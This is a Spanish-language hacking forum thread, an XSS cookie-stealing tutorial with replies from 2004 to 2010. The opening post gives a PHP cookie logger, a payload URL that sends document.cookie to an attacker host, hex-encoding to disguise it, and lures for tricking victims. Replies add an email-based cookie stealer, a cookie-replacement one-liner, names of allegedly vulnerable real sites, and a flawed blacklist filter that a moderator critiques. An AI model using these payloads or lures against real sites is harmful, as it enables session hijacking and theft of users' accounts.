Foro de elhacker.net

Informática => Tutoriales - Documentación => Mensaje iniciado por: Rentero en 24 Mayo 2004, 03:49 am



Título: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 24 Mayo 2004, 03:49 am
Bueno pues voy ha hacer una pequeña introducción a los ataques XSS, el caso que voy a poner es el de una web que utilize cookies y tenga un buscador(el típico buscador que tiene una caja de texto y un botón).
decir que para una facil compresión de este mini-tutorial es mejor tener unos conocimientos básicos sobre html.

[~]Lo primero es hacer una pequeña introduccion sobre que es una cookie:
Citar
- Una cookie es un almacen de informacion que se guarda en el ordenador del usuario y en cualkier momento la pagina puede pedir la informacion, que contiene la cookie, al ordenador del usuario...

  • Ahora que sabemos que es una cookie lo que vamos ha hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php(xDD)
  • Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
Código:
<script>alert()</script>

[~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnerable.
[~]Si no salta pues no jodemos y a buscar otro...

  • Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de texto y del botón.
Para esto, tenemos que ver el codigo fuente de dicha página y buscar algo como:
<input type="text" name="palabra"> que será el textbox(caja de texto xD).
<input type="submit" name="buscar" value="Buscar"> que será el boton.

  • Ahora ya sabemos que el textbox se llama palabra y que el botón se llama buscar.

    [~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).

  • A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) cuando algun usuario caiga en el ataque y escribira a continuacion los siguientes usuarios.
cookies.php
Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

archivo.txt
Este archivo se creara automaticamente y será en el que se almacenen las cookies, osease, que para ver los resultados teneis que entrar en este archivo.

  • Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo) que será de la siguiente forma:
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

  • Voy a explicar cada parte de esta "URL MALIGNA".
  • [~]
http://www.vulnerable.com/buscador.php
Esta parte lo unico que hace es entrar en la pagina del buscador.

[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox se llamara manolo esto quedaría de la siguiente forma: ?manolo=

Lo mas importante:
[~]<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
Esto es el valor que le damos a la variable palabra (que es el textbox). Este valor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.php y le da el valor de la cookie(del usuario de la web) a la variables cookie de la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.

[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado, sin esto no realizaria la acción.
Tambien decir que si el botón del buscador se llamara jose, eso tendriamos que reemplazarlo por &jose=;

  • Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que esté registrado) entre en ese enlace("LA URL MALIGNA").
Esto seguramente sea la parte mas complicada, porque cualkier persona con unos conocimientos muy basicos de programacion web sabría lo que hace esa "URL MALIGNA". Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexagesimal poniendo el signo % delante de cada uno.

Aquí os dejo una buena tabla HEX:
http://www.ascii.cl/es/

Con lo cual iría quedando algo así:
Código:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...
esto equivaldría a:
Código:
palabra=<script>...
y tendrias que continuar cambiando los caracteres a hexagesimal.

Como conseguir que un usuario de esa web entre en esa URL, jejeje, pues ¡¡¡puedes decirle que le toca un premio si entra!!!(xDD) o puedes entrar al foro de esa web(si lo tuviera) y poner la direccion con alguna buena escusa como: "Que le pasa a la web, cuando entro en esta URL me sale una tía en bolas";
Otra opción es ponerlo como una noticia (si tienes un sistemas de noticias) o como se te ocurra.

=============================================
Solo me queda decir que no solo son vulnerbles a un ataque XSS los buscadores, puede ser cualquier formulario que os encontreis por internet, desde un registro de usuario hasta un foro(lo digo por experiencia).
=============================================

CONCLUSION: Este ataque se basa en redireccionar a un usuario(sea como sea) hacia una pagina, tuya, en la que guardes su cookie.

Creo que como introduccion no esta mal, aunque por las bullas de ponerlo pronto a lomejor me he quedado sin decir algo, weno si me acuerdo lo pongo...

Saludos by neohex

P.D:Por supuesto si algo esta mal o lo sabeis explicar mejor o esto es una *****, pues decirlo aqui...

P.D2:No sabía si ponerlo en Exploit o en Dudas hack, si lo considerais necesario moverlo.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Crack_X en 24 Mayo 2004, 04:17 am
una pequeña pregunta... se puede reproducir este texto , osea puedo ponerlo en mi pagina ? :P


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 24 Mayo 2004, 04:29 am
Si, mientras menciones la fuente.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: dxr en 24 Mayo 2004, 05:50 am
1º como sabemos el nombre de la cookie original??? para nombrarla asi...

y 2º para q esto funcione osea teniendo la cookie... por ejhemplo si tengo la cookie de un admin de una web y quiero entrar como si fuera el, el tendria q tener el logeo  automatico no??? sino no serviria... o ay algun modo de entrar a traves de la cookie poniendola en la url o algo?

---------------------------------------------------------------------------------

Otra cosa en q se vaya si es vulnerable o no? osea para q salte la alerta???

xq en una web con un buscador pongo:

<script>alert()</script>

y contesta:

No se han encontrado resultados para "<script>alert()</script>" en noticias.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: -Riven-Ward- en 24 Mayo 2004, 05:59 am
En ese caso que tu dices que te tira el texto escrito, y no la alerta, -NO- es vulnerable. Como muy bien dijo el neo, debe salirte la alerta para que sea vulnerable.


Salu2!


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 24 Mayo 2004, 06:24 am
1º-> Nombre original de la cookie???...cuando tu obtienes la cookie obtienes el nombre de la cookie y luego su valor
de esta forma:
n_user=neohex;
Es decir: la cookie n_user es igual a al valor neohex

poniendote el ejemplo de mi website:
yo cuando un usuario se loggea coloco dos cookies:
-Una con su nombre de usuario
-Otra con su password

a la primera la llamo n_user y a la segunda n_pass y si me hago el atako a mi mismo -> los valores que me dan(en el archivo.txt) son de esta forma:
n_user=neohex; n_pass=123456

Siendo neohex el usuario y 123456 la contraseña.


2º Si tienes el user y conseña de un usuario(o del admin) no tienes que complicarte creando una cookie o insertando una URL, directamente solo tienes que ir a la pagina de loggeo y poner el user y el pass, como si fueran los tuyos, ..no se si me explico.

---------------------------------------------
Otra cosa...como dice riven-ward, no es vulnerable puesto que no te salta la alarma y te lo muestra como texto.

y poner <scritp>alert()</script> no es mas que una forma de probar, si te es mas comodo puedes poner lo que kieras(<u>algo</u>, <font size="20">algo</font>, etc)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: dxr en 24 Mayo 2004, 06:41 am
ya pero supongo q los nombres de usuarios y las contraseñas estaran encriptadas en la cookie no?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: byebye en 24 Mayo 2004, 07:34 am
la contraseña casi seguro que si, pero te creas la cookie y la pagina te reconocera como el usuario.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Firos en 4 Junio 2004, 08:44 am
Yo tenía un par de dudas... leí, quizas el sueño me tenga un poco liado.

Alguna vez he visto como la gente hace ese tipo de ataques y creo que el archivo cookies.php que tu nombras (el que tu creas) lo creas en una pagina web tuya, no?

Cuando pones esa url en el foro, lo que haces es enviar a esas personas a la url de esa página, pero como esta sustituida por una tuya se envian los datos a donde esta hospedada cookies.php, no?

Pero donde **** están los archivos *.txt donde aparece el user y el pass, en el servidor? a donde se envian?

Salu2..


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 4 Junio 2004, 20:00 pm
Mira, es más simple de lo que parece....haber...en definitiva lo que hace es que cuando un usuario entra en esa URL, lo redirecciona a la pagina(cookies.php) que TU has creado en tu hosting. Si miras la URL verás lo que pasa:
Código:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
Te voy a poner en texto lo que esto hace:
"La pagina(cookies.php) tiene una variable(cookie), y a la variable cookie vamos a darle el valor que tiene la cookie del usuario(cookie='+document.cookie;)".

Ahora nos podemos fijar en el archivo cookies.php(que tienes que crear tú y ponerlo en tu hosting)
Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
Vamos a fijarnos en que hace este archivo linea por linea.

1.- $cookie = $_GET['cookie']; -Recoje el valor de la variable cookie(que es la cookie del usuario(cookie='+document.cookie;)).

2.- $fff = fopen("archivo.txt","a"); - Abre una conexion con el archivo de texto (archivo.txt) y si no existe lo crea automaticamente.

3.- fwrite($fff, "$cookie \n"); - Escribe dentro del archvio(archivo.txt) el contenido de la variable $cookie(que tiene el valor de la cookie del usuario) y aparte pone un salto de linea para que la siquiente cookie que recibas no se escriba a continuacion sino debajo de la anterior.

4.- fclose($fff); - Cierra la conexion con el archivo(archivo.txt).

RESUMEN:
1- Creas el archivo cookies.php y lo subes a tu hosting.
2- Creas la "URL MALIGNA" con los datos de la web vulnerable.
3- Intentas que un usuario de esa web entre en esa URL(de la forma que sea-> foro, pidiendoselo, etc)
4- Para ver lo resultados(es decir, ver cuantos usuarios han caido en tu trampa) tienes que entrar en tu archivo.txt(http://www.atacante.com/archivo.txt)

Con lo cual tu el único archivos que tienes que crear es el cookies.php, porque el archivo.txt es solo para ver lo resultados y se crea automaticamente.

Espero que te haya quedado claro... ;D ;D


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Firos en 5 Junio 2004, 01:08 am
Ok ok, muchas gracias, mas o menos tenia la idea ;)

Salu2..


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: -Riven-Ward- en 14 Julio 2004, 13:33 pm
Pido perdón por revivir este post un poco viejo, pero releyendolo me dí cuenta de algo:

poniendote el ejemplo de mi website:
yo cuando un usuario se loggea coloco dos cookies:
-Una con su nombre de usuario
-Otra con su password

a la primera la llamo n_user y a la segunda n_pass y si me hago el atako a mi mismo -> los valores que me dan(en el archivo.txt) son de esta forma:
n_user=neohex; n_pass=123456

Hace poco hice mi Sistema de Registro de users, y guardaba la cookie con el nombre del user y su contraseña.

Luego me dí cuenta de que si "algún hacker" entra en el PC de alguno de mis users, lo primero (o una de las primeras) cosas que hará sería ir a ver las Cookies, entonces obtendría la contraseña del user.

Y tomando en cuenta eso, supongo que las páginas importantes o los programadores "inteligentes" no guardarían la contraseña en una Cookie...


PD: neohex, te recomiendo que también dejes de guardar la contraseña en una Cookie


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 15 Julio 2004, 04:40 am
Haber, mientras la contraseña esté bien cifrada no hay problema por el simple hecho de que si entra una persona en el pc de un user de tu website no creo que lo que vaya ha buscar sea precisamente la cookie de tu web, creo que se preocuparia por buscar otras cosas (como el archivo SAM y cosas mas importantes).

Ademas, es un riesgo que todo webmaster debe correr xD.

P.D: También hay que tener en cuenta que tu debes preocuparte de la seguridad de tu página web lo mismo que cada usuario debe preocuparse de la seguridad de su pc.
-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

P.D2: Preocupate por hacer tu web lo mas segura posible, que lo demas ya viene solo.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: -Riven-Ward- en 17 Julio 2004, 05:09 am
Ademas, es un riesgo que todo webmaster debe correr xD.

--------

-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

1- No es necesario poner la contraseña en la cookie, no sirve de mucho :-\

2- Mucha, MUCHA gente usa la misma contraseña para casi todas sus cosas, y el "hacker" seguramente pensará en eso :).


Salu2!


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 17 Julio 2004, 05:19 am
Haber Riven tio.....que manía tienes con quedarte encima mia xDDD.

Te explico:
-Tienes que poner la contraseña en la cookie porque si pones solo el nombre de usuario cualquiera puede cambiar su cookie y poner el nombre del administrador con lo cual ya se ha saltado tu sistema...... ::)

Te repito que si alguien entra en tu pc no va ha ir precisamente a por la cookie de tu web, se encargará de hacer cosas "mas bonitas".

P.D: Mientras le pases md5(md5($pass)); es suficiente...por lo menos eso ya es incrackeable(por fuerza bruta, siempre que la contraseña sea de una longitud considerable.)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: joserra89 en 15 Septiembre 2004, 08:03 am
Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: 9reynas en 10 Noviembre 2004, 11:03 am
debido  a lo antiguo de este no se si  daran respuesta  bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
 umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la  que le tendrian que linkear los demas
 que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
 asi ademas esta web  no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: 9reynas en 10 Noviembre 2004, 11:37 am
respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  ::)
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie



cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro  lo del archivo.txt que se deposita la cokie alli tambiene sta caro
 pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi  en este formato          lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

 ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;





ahora analizando la primera pareja checamos esta parte
 'http://www.atacante.com/cookies.php?cookie='+document.cookie


ahora  en esto el  cgi seria cookies.php
 y su pareja seria cookie='+document.cookie



ahora sia lguien postea las  fuentes de buscador.php seria buenisimo igual  la voya  buscar supongo que eso nos aclararia bastante loq ue hace esa url

 buenoo voya buscar ciao 
9reynas
  de ante mano si me equivoco en algo corriganme y  nada salu2






Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Adept en 12 Noviembre 2004, 02:18 am
Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Falso Positivo en 15 Agosto 2005, 23:02 pm

Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: joanikus en 18 Agosto 2005, 18:06 pm
okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 18 Agosto 2005, 18:37 pm
Ni me acordaba de este tutorial xD


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.


En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit().
Mira el código fuente de esa función a ver si puedes sacar algo :)

P.D: Recuerdo que esto es solo un pequeño texto de introducción :)
Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: joanikus en 20 Agosto 2005, 13:02 pm
eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Rentero en 20 Agosto 2005, 14:31 pm
Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: -sagitari- en 1 Septiembre 2005, 16:49 pm
una web vulnerable a este tipo de atake es:

www.programas-gratis.net

si no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable...


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: sirdarckcat en 6 Agosto 2006, 09:38 am
@Torocatala:
prohibido dar informacion de terceros.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: satan69 en 7 Agosto 2006, 07:07 am
mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji ;D ;D ;D


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Crack_X en 7 Agosto 2006, 07:11 am
http://www.elhacker.net/sneak.php


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: satan69 en 7 Agosto 2006, 07:16 am
http://www.elhacker.net/sneak.php

gracias.. ;D ;D


ademas de eso quiero que me ayuden hacer un link maligno..


Código:
                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><

http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;


la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: frankener1986 en 4 Septiembre 2006, 22:49 pm
Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD     


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Ch@CaL en 11 Septiembre 2006, 16:49 pm
Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: |Azrack| en 6 Diciembre 2006, 00:03 am
y si yo le paaso solo el enlace:
Código:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: security en 22 Mayo 2007, 17:06 pm
<script>alert()</script>


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Dr. Stephen Falken en 9 Enero 2008, 19:46 pm
A día de hoy esta vulnerabilidad está casi capada. No?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: NaphacK en 30 Enero 2008, 20:20 pm
A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables...
 Aunque tengo una duda...
 Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
 www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
 Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
 Saludos...
 ;) ;) ;)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: merinodaniel en 20 Octubre 2008, 00:55 am
hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

Código:
<?php
     $cookie = $_GET["cookie"];
     mail("admin@gensale.net", "Cookie stealer report", $cookie);
?>

este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: R007h en 22 Diciembre 2008, 01:28 am
Hola, sta muy bueno el txt...

ya me consegui unas cookies pero cuando me voy al site y pongo
Código:
javascript: prompt('',document.cookie);

luego reemplazo las cookies por las que yo consegui, no pasa nada, sigue estando cerrada la session de mi victima, que pasa?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: sirdarckcat en 22 Diciembre 2008, 03:35 am
usa este:
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: slackbyte en 4 Febrero 2009, 09:08 am
Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">

y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 12 Junio 2009, 20:53 pm
Este es el Codigo permite proteger ataques xss  :rolleyes:

Código:
<?php 
function xss($val) {
$patron = '[ ]+';
$val= ereg_replace($patron,' ', $val);

$patron = '[ ]*>';
$val= ereg_replace($patron,'>', $val);

$a=array('xml','script', 'applet','embed','iframe','frame', 'frameset','ilayer');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
$tag='<'.$a[$i];
if(strpos($val,$tag)!==false){
$patron = $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>';
$val= eregi_replace($patron,'', $val);
}
}

$a=array('link','meta','base');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,'<'.$a[$i])!==false){
$val= str_ireplace('<'.$a[$i],'<x',$val);
}
}

$a=array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','http-equiv','content','charset');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,$a[$i].'=')!==false){
$val= str_ireplace($a[$i].'=','',$val);
}
}
return $val;
}

?>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 12 Junio 2009, 20:59 pm
Probando el Ejemplo: xss.php (nombre del php que contiene la funcion xss)
Código:
<html><head>
<title>Ataques XSS</title>
</head>
<body>
<form id="form1" name="form1" method="post" action="XSS1.php">
  Nombre usuario
    <input name="txt_nom" type="text" id="txt_nom" size="80" /> 
  <input type="submit" name="button" id="button" value="Enviar" />
</form>
</body>
</html>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 12 Junio 2009, 21:00 pm
Dentro de XSS1.php, escribimos esto:
Código:
<?php
include('xss.php');
$nom  = $_POST['txt_nom'];
$nom = xss($nom);
echo $nom;
?>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: sirdarckcat en 13 Junio 2009, 18:02 pm
esa es una pesima funcion para proteger contra ataques de xss..


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Og. en 14 Junio 2009, 00:39 am
esa es una pesima funcion para proteger contra ataques de xss..


mmm por que?
al menos yo no le veo un bug


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 16 Junio 2009, 23:22 pm
sirdarckcat, quiero saber a que se debe su comentario.  >:( . Me gustaria saber su respuesta, gracias.  ;)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: sirdarckcat en 17 Junio 2009, 10:29 am
se me viene a la mente.. <embed src="//sirdarckcat.net/xss.swf"> o.. <script/src=//0x.lv/.. y la vdd me da flojera pensar en mas xD la cantidad de formas de burlar ese filtro son infinitas..

esta basado en blacklisting (primer error), usa una lista de tags muy incompleta (segundo error), asume que el codigo que mandara el atacante es valido (tercer error), no toma en cuenta las extensiones de los navegadores (cuarto error), y hay mas errores pero ando con flojera.

Saludos!!


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 20 Junio 2009, 02:32 am
sirdarckcat, no sabia que era miembro del STAFF de elhacker.net  :-( Con el respeto que se merece, me gustaria saber como prevenir esos ataques :¬¬. Uno sabe que nadie es perfecto, pero con la ayuda de uno, se puede mejorar la programación.  ;) Me gustaría que saber como usted crearía la función, para prevenirnos de los ataques XSS.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Darioxhcx en 20 Junio 2009, 02:44 am
html_entities ?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: KarlosVid(ÊÇ) en 20 Junio 2009, 03:12 am
 ;D Si pues, solo quería ver otras ideas, para así mejorarla. Todos saben que nada es fácil y todo se puede.  ::) Estamos para ayudarnos.  :o


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Skeletron en 18 Noviembre 2009, 15:21 pm
Hola gente..
Hay manera de enviar un e-mail con la cookie con javascript?
O lo mas recomendable es escribir en algun archivo de algun hosting?


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: jdc en 18 Noviembre 2009, 15:24 pm
Lo más recomendable es guardar en hosting a travez de php, aunque junto con guardarla podrías mandarla al mismo tiempo con php a tú correo :) siempre con php, no creo que javascript tenga funciones para enviar correos ya que se ejecuta de lado del cliente


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: FL4M4-D0R4D4 en 11 Junio 2010, 01:03 am
Hola amigo intente ponerlo el primero codigo (<script>alert()</script>) y al momento y me salio esto la pagina es www.z8games.com
(http://i46.tinypic.com/mwy5hy.png)
no se si es algo malo o bueno ( Soy novato)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: jdc en 11 Junio 2010, 06:30 am
Eso es porque el programador dejo mostrando los errores, no significa que sea vulnerable por si misma.


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: Danielyyo en 5 Septiembre 2010, 17:33 pm
Hola a todos,

